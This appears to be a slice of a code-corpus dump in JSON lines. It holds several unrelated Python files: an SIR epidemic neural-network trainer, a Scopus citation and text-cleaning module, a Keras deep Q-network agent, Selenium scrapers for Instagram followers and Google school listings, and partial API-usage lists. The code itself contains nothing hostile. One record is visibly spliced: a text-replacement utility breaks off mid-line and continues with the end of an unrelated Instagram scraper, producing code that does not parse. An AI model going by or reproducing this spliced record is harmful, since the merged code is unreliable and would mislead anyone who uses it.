"line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 211, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 232, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 252, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 270, "usage_type": "attribute"}, {"api_name": 
"torch.nn.init.constant_", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "attribute"}, {"api_name": "utils.lecun_uniform", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 279, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 281, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 316, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 329, "usage_type": "attribute"}, {"api_name": "configuration.SampleRNNConfiguration", "line_number": 333, "usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 334, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 336, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 339, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 341, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 343, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 346, "usage_type": "name"}, {"api_name": "configuration.SampleRNNConfiguration", "line_number": 348, "usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 358, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 358, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 363, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 363, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 367, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 367, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 371, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 371, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 561, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 567, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 
674, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 702, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 702, "usage_type": "attribute"}]} +{"seq_id": "12357506201", "text": "import importlib\nimport inspect\nimport os\nimport sys\n\nfrom collections import defaultdict\n\n\ndef make_replace_for_doc(text):\n for to_replace in REPLACE_TO_EMPTY_STR:\n text = text.replace(to_replace, '')\n\n return text\n\n\ndef make_replace_for_response_and_value(text):\n for to_replace in REPLACE_TO_LIST:\n text = text.replace(to_replace, 'list')\n\n for _from, to in REPLACE_TO_ANOTHER.items():\n text = text.replace(_from, to)\n\n return text\n\n\ndef make_replace_for_constant(text):\n text = str(text)\n if ' number_of_followers or math.fabs(next_length - number_of_followers) < 5:\r\n break\r\n\r\ncursor.close()\r\ncon.close()\r\nbrowser.close()\r\n\r\n\r\n", "repo_name": "IbragimovaS/Parser", "sub_path": "new_insta.py", "file_name": "new_insta.py", "file_ext": "py", "file_size_in_byte": 8811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.Session", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 66, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 88, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 103, "usage_type": "call"}, {"api_name": "ibm_db_dbi.connect", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 127, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 141, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "39292279938", "text": "from training import train\nfrom constants import ROOT_DIR\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom models import SIRNetwork\nfrom utils import SIR_solution\n\nif __name__ == '__main__':\n\n # Initial Conditions\n N = 1\n rescaling_factor = 1\n\n infected = 0.2\n susceptible = N - infected\n recovered = 0\n\n s_0 = susceptible / N * rescaling_factor\n i_0 = infected / N * rescaling_factor\n r_0 = 0\n\n # Equation parameters\n initial_conditions = [0, [s_0, i_0, r_0]]\n beta = round(0.8, 2)\n gamma = round(0.2, 2)\n\n # Sanity check\n assert i_0 + s_0 + r_0 == rescaling_factor\n\n # Model parameters\n t_final = 20\n train_size = 2500\n decay = 0.0\n hack_trivial = False\n epochs = 1000\n lr = 8e-4\n\n # Scipy 
solver solution\n t = np.linspace(0, t_final, t_final)\n s_p, i_p, r_p = SIR_solution(t, s_0, i_0, r_0, beta, gamma)\n\n # Init model\n sir = SIRNetwork(layers=2, hidden=50)\n\n try:\n # It tries to load the model, otherwise it trains it\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n except FileNotFoundError:\n # Train\n optimizer = torch.optim.Adam(sir.parameters(), lr=lr)\n writer = SummaryWriter(\n 'runs/' + 's_0={:.2f}-i_0={:.2f}-r_0={:.2f}-t_0={:.2f}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[\n 0],\n t_final, beta,\n gamma))\n sir, train_losses, run_time, optimizer = train(sir, initial_conditions, t_final=t_final, epochs=epochs,\n num_batches=10, hack_trivial=hack_trivial,\n train_size=train_size, optimizer=optimizer,\n decay=decay,\n writer=writer, beta=beta, gamma=gamma)\n # Save the model\n torch.save({'model_state_dict': sir.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()},\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final,\n beta,\n gamma))\n # Load the checkpoint\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n\n # Load the model\n sir.load_state_dict(checkpoint['model_state_dict'])\n\n # Test between 0 and t_final\n grid = torch.arange(0, t_final, out=torch.FloatTensor()).reshape(-1, 1)\n t_dl = DataLoader(dataset=grid, batch_size=1, shuffle=False)\n s_hat = []\n i_hat = []\n r_hat = []\n\n for i, t in enumerate(t_dl, 0):\n # Network solutions\n s, i, r = sir.parametric_solution(t, initial_conditions)\n s_hat.append(s.item())\n i_hat.append(i.item())\n r_hat.append(r.item())\n\n # Colors and Linewidth\n blue = '#3366ff'\n red = '#cc0000'\n green = '#13842e'\n linewidth = 1.5\n # Plot network solutions\n plt.figure(figsize=(12, 5))\n plt.plot(range(len(s_hat)), s_hat, label='Susceptible', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_hat)), i_hat, label='Infected', color=red, linewidth=linewidth)\n plt.plot(range(len(r_hat)), r_hat, label='Recovered', color=green, linewidth=linewidth)\n plt.plot(range(len(s_p)), s_p, label='Susceptible - Scipy', linestyle='--', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_p)), i_p, label='Infected - Scipy', linestyle='--', color=red, linewidth=linewidth)\n plt.plot(range(len(r_p)), r_p, label='Recovered - Scipy', linestyle='--', color=green, linewidth=linewidth)\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.legend(loc='lower right')\n plt.xlabel('Time')\n plt.ylabel('S(t), I(t), R(t)')\n plt.savefig(\n ROOT_DIR + '/plots/SIR_s0={:.2f}_i0={:.2f}_r0={:.2f}_beta={}_gamma={}.png'.format(s_0, i_0, r_0, beta, gamma))\n plt.show()\n\n # Compute loss as a function of the time\n log_losses = []\n for i, t in enumerate(t_dl, 0):\n from losses import sir_loss\n\n t.requires_grad = True\n s, i, r = sir.parametric_solution(t, initial_conditions)\n t_loss = sir_loss(t, s, i, r, beta, gamma)\n log_losses.append(np.log(t_loss.item()))\n\n plt.figure(figsize=(15, 5))\n plt.plot(range(len(log_losses)), log_losses)\n plt.xlabel('Time')\n 
plt.ylabel('Logloss')\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.show()\n", "repo_name": "tmscarla/improving-transfer-learning", "sub_path": "differential-equations/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.SIR_solution", "line_number": 43, "usage_type": "call"}, {"api_name": "models.SIRNetwork", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 50, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 60, "usage_type": "call"}, {"api_name": "training.train", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 73, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 83, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 126, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "constants.ROOT_DIR", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "losses.sir_loss", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "29232882305", "text": "#!/usr/bin/python3\n'''\nNew module, used for working with ncbi data.\n'''\nimport pandas as pd\nimport numpy as np\nimport requests\nimport os\nimport sys\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\ntry:\n API = os.environ['ELSKEY']\nexcept:\n print(\"Need to source the API keys!\")\n\ndef get_citedby(PMID):\n '''\n Get number of citations for an articles based on PMC code. 
Uses Elsevier API.\n '''\n try: \n scopus = requests.get('http://api.elsevier.com/content/search/scopus?query=PMID(%s)&field=citedby-count' % PMID, headers={'X-ELS-APIKEY':API})\n return scopus.json()['search-results']['entry'][0]['citedby-count']\n except Exception as e:\n print(e)\n return np.nan\n\ndef create_scopus_link(pmids):\n '''\n Creates a link to make a query about 25 articles (based on PMC codes).\n '''\n beg = 'http://api.elsevier.com/content/search/scopus?query=PMID(%s)' % pmids[0]\n final = [beg]\n end = '&field=citedby-count'\n for l in pmids[1:]:\n final.append('+OR+PMID(%s)' % l)\n return ''.join(final)\n\ndef get_25_citedby(pmids, output):\n '''\n Records info about 25 articles as a tsv file\n '''\n link = create_scopus_link(pmids)\n try:\n json = requests.get(link, headers={'X-ELS-APIKEY':API}).json()['search-results']['entry']\n except:\n print(\"Unable to send request\")\n return\n for pmid, info in zip(pmids,json):\n try:\n date = info['prism:coverDate']\n citedby = info['citedby-count']\n title = info['dc:title']\n pubmed = info['pubmed-id']\n with open(output, 'a+') as output:\n output.write('%s\\t%s\\t%s\\t%s\\t%s\\n' % (pmid, date, citedby, title, pubmed))\n except:\n print('Unable to retrieve article with PMID %s' % pmid)\n\n\ndef clean_text(location, new_location):\n '''\n Clean a textfile, save a new one\n '''\n stop = stopwords.words('english')\n def remove_stop(word):\n if word not in stop:\n return word\n else:\n return np.nan\n stemmer = PorterStemmer()\n file = open(location, 'r').read()\n l = file.split('====')\n body = l[2]\n body = pd.Series(body.split())\n body = body.str.lower()\n body = body[~body.str.contains('www|http|@')]\n body = body.str.replace('[^\\w\\s]', '')\n body = body[~body.str.contains('^\\d+$')]\n body = body.apply(remove_stop).dropna()\n body = body.apply(stemmer.stem)\n body.to_csv(new_location, index=False)\n return body\n\ndef clean_all_files_in_dir(inpdir, outdir):\n for f in os.listdir(inpdir):\n try:\n clean_text(inpdir+f, outdir+f)\n except Exception as e:\n print(e)\n\n", "repo_name": "ilsenatorov/articles", "sub_path": "mining.py", "file_name": "mining.py", "file_ext": "py", "file_size_in_byte": 2734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 28, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 67, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 72, "usage_type": "attribute"}, {"api_name": "nltk.stem.PorterStemmer", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "74594433767", "text": "import copy\nimport random\n\nimport numpy as np\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import Adadelta\n\n# A system for steering based on the center line of the road using a deep Q-network, meaning the network\n# gradually learns while attempting to drive the car\n# Created by brendon-ai, January 2018\n\n# The base discount rate, which should be between 0 and 1\nBASE_DISCOUNT = 
0.8\n\n# The initial value exploration rate used for the reinforcement learning algorithm\nEPSILON_INITIAL = 1.0\n# The decay value by which the epsilon is multiplied every iteration\nEPSILON_DECAY = 0.9999\n# The minimum value that epsilon can decay to\nEPSILON_MIN = 0.01\n# The minimum number of examples in the memory before training begins\nMIN_TRAINING_EXAMPLES = 100\n\n\n# The deep Q-network agent, including a neural network but handling training and other functionality\nclass DeepQNetworkAgent:\n\n # Initialize the agent including the model and other attributes\n def __init__(self, state_size, action_size):\n # Initialize the value of epsilon which will be changed over the life of the agent\n self.epsilon = EPSILON_INITIAL\n\n # Initialize the agent's memory, which will store past time steps for training\n self.memory = []\n\n # Set the provided state size and action size as global variables\n self.state_size = state_size\n self.action_size = action_size\n\n # Use a rectified linear activation function\n activation = 'tanh'\n # Create the neural network model simply using a series of dense layers\n self.model = Sequential([\n Dense(3, input_shape=(self.state_size,), activation=activation),\n Dense(5, activation=activation),\n Dense(self.action_size)\n ])\n # Use an Adam optimizer with the predefined learning rate\n optimizer = Adadelta()\n # Compile the model with a mean squared error loss\n self.model.compile(\n loss='mse',\n optimizer=optimizer\n )\n\n # Add a set of values packaged as a single time step to the memory, and update rewards for previous memories\n def remember(self, state, action, reward, done):\n # Add the new value to the memory as it is (it will be updated to accommodate future rewards later)\n self.memory.append([state, action, reward, done])\n # Get the index of the most recent element in the memory\n max_memory_index = len(self.memory) - 1\n # Iterate over all indices in the array, excluding the one that was just added, in reverse\n for memory_index in reversed(range(max_memory_index)):\n # If the game ended at this example, it had no bearing on future rewards, so iteration should stop\n memory_example = self.memory[memory_index]\n if memory_example[3]:\n break\n\n # Get the age of this memory example (the number of examples that have been added since this one)\n age = max_memory_index - memory_index\n # Take the discount to the power of the age of this example\n # This will exponentially discount the value of the current reward for older examples in the memory\n discount = BASE_DISCOUNT ** age\n # Multiply the current reward by this discount and add it to the reward for this previous example\n memory_example[2] += reward * discount\n\n # Run a prediction on a state and return an array of predicted rewards for each possible action\n def predict(self, state):\n # Use the neural network to process the state directly\n network_output = self.model.predict(state)\n # Return the first element of the output on the first axis, effectively removing the single-element batch axis\n return network_output[0]\n\n # Act based on a provided state, choosing either to explore or to act based on past learning\n def act(self, state):\n # Choose randomly whether or not to act randomly, depending on the exploration rate\n if np.random.rand() <= self.epsilon:\n # Choose a random value less than the number of valid actions\n return random.randrange(self.action_size)\n # Otherwise, an action must be chosen based on the current state\n else:\n # Use the neural network to predict the 
reward for each of the valid actions\n reward_predictions = self.predict(state)\n # The actions is the index of the maximum predicted reward\n return np.argmax(reward_predictions)\n\n # Decay the epsilon so that actions become more frequently determined by the network rather than randomly\n def decay(self):\n # If the epsilon has not already gone as low as it is allowed to\n if self.epsilon > EPSILON_MIN:\n # Multiply it by the decay factor\n self.epsilon *= EPSILON_DECAY\n\n # Train the neural network model; this is to be iterated over, and yields the loss or None on each iteration\n def train(self):\n # Run an infinite loop in which the training is done\n while True:\n # Yield immediately if there is less than a specified number of training examples in the memory, so that the\n # network does not quickly overfit on a very small number of examples\n if len(self.memory) < MIN_TRAINING_EXAMPLES:\n yield None\n\n # Iterate over the entire memory in a random order\n memory_random = copy.copy(self.memory)\n random.shuffle(memory_random)\n for state, action, reward, _ in memory_random:\n # Make a prediction based on this state, but replace the reward for the action on this time step\n target_prediction = self.model.predict(state)\n target_prediction[0, action] = reward\n # Train the model based on this modified prediction, getting the most recent loss value\n loss = self.model.fit(x=state, y=target_prediction, epochs=1, verbose=0).history['loss'][0]\n # Yield the loss to the calling loop so that inference can be done between any pair of training runs\n yield loss\n", "repo_name": "bfmat/LaneDetection", "sub_path": "model/deep_q_network_agent.py", "file_name": "deep_q_network_agent.py", "file_ext": "py", "file_size_in_byte": 6194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.models.Sequential", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.optimizers.Adadelta", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 96, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 115, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "74899928169", "text": "import csv\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass EscolaScraper:\n def __init__(self, nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade):\n self.nome = nome\n self.endereco = endereco\n self.cidade = cidade\n self.estado = estado\n self.telefone = telefone\n self.cep = cep\n self.nivel_escolaridade = nivel_escolaridade\n\n\ndef coletar_escolas():\n escolas = []\n\n\n service = Service('/Users/joaosilva/Downloads/chromedriver_mac64/chromedriver') # Substitua pelo caminho do chromedriver\n options = Options()\n options.add_argument('--headless') # Executar o Chrome em modo 
headless (sem interface gráfica)\n driver = webdriver.Chrome(service=service, options=options)\n\n\n driver.get('https://www.google.com')\n search_box = driver.find_element(By.NAME, 'q')\n search_box.send_keys('escolas de tres lagoas')\n search_box.send_keys(Keys.RETURN)\n\n resultados = driver.find_elements(By.CLASS_NAME, 'g')\n\n for resultado in resultados:\n try:\n nome = resultado.find_element(By.TAG_NAME, 'h3').text\n endereco = resultado.find_element(By.CSS_SELECTOR, 'div.VkpGBb').text\n cidade_estado = resultado.find_element(By.CSS_SELECTOR, 'span.B6fmyf').text\n telefone = resultado.find_element(By.CSS_SELECTOR, 'div.xpdopen > div > div > div > span').text\n cep = resultado.find_element(By.CSS_SELECTOR, 'span.LrzXr').get_attribute('data-attrid')\n nivel_escolaridade = resultado.find_element(By.CSS_SELECTOR, 'div.qsm0tb').text\n\n cidade_estado_split = cidade_estado.split(',')\n cidade = cidade_estado_split[0].strip()\n estado = cidade_estado_split[1].strip()\n\n escola = EscolaScraper(nome, endereco, cidade, estado, telefone, cep, nivel_escolaridade)\n escolas.append(escola)\n except Exception as e:\n print(f\"Erro ao extrair informações: {str(e)}\")\n\n driver.quit()\n\n return escolas\n\n\ndef salvar_csv(escolas):\n with open('escolas.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerow(['Nome', 'Endereço', 'Cidade', 'Estado', 'Telefone', 'CEP', 'Nível de Escolaridade'])\n for escola in escolas:\n writer.writerow([escola.nome, escola.endereco, escola.cidade, escola.estado, escola.telefone,\n escola.cep, escola.nivel_escolaridade])\n\n\nescolas = coletar_escolas()\nsalvar_csv(escolas)", "repo_name": "JPGSilva/web-scraping", "sub_path": "EscolaScraper.py", "file_name": "EscolaScraper.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 27, "usage_type": 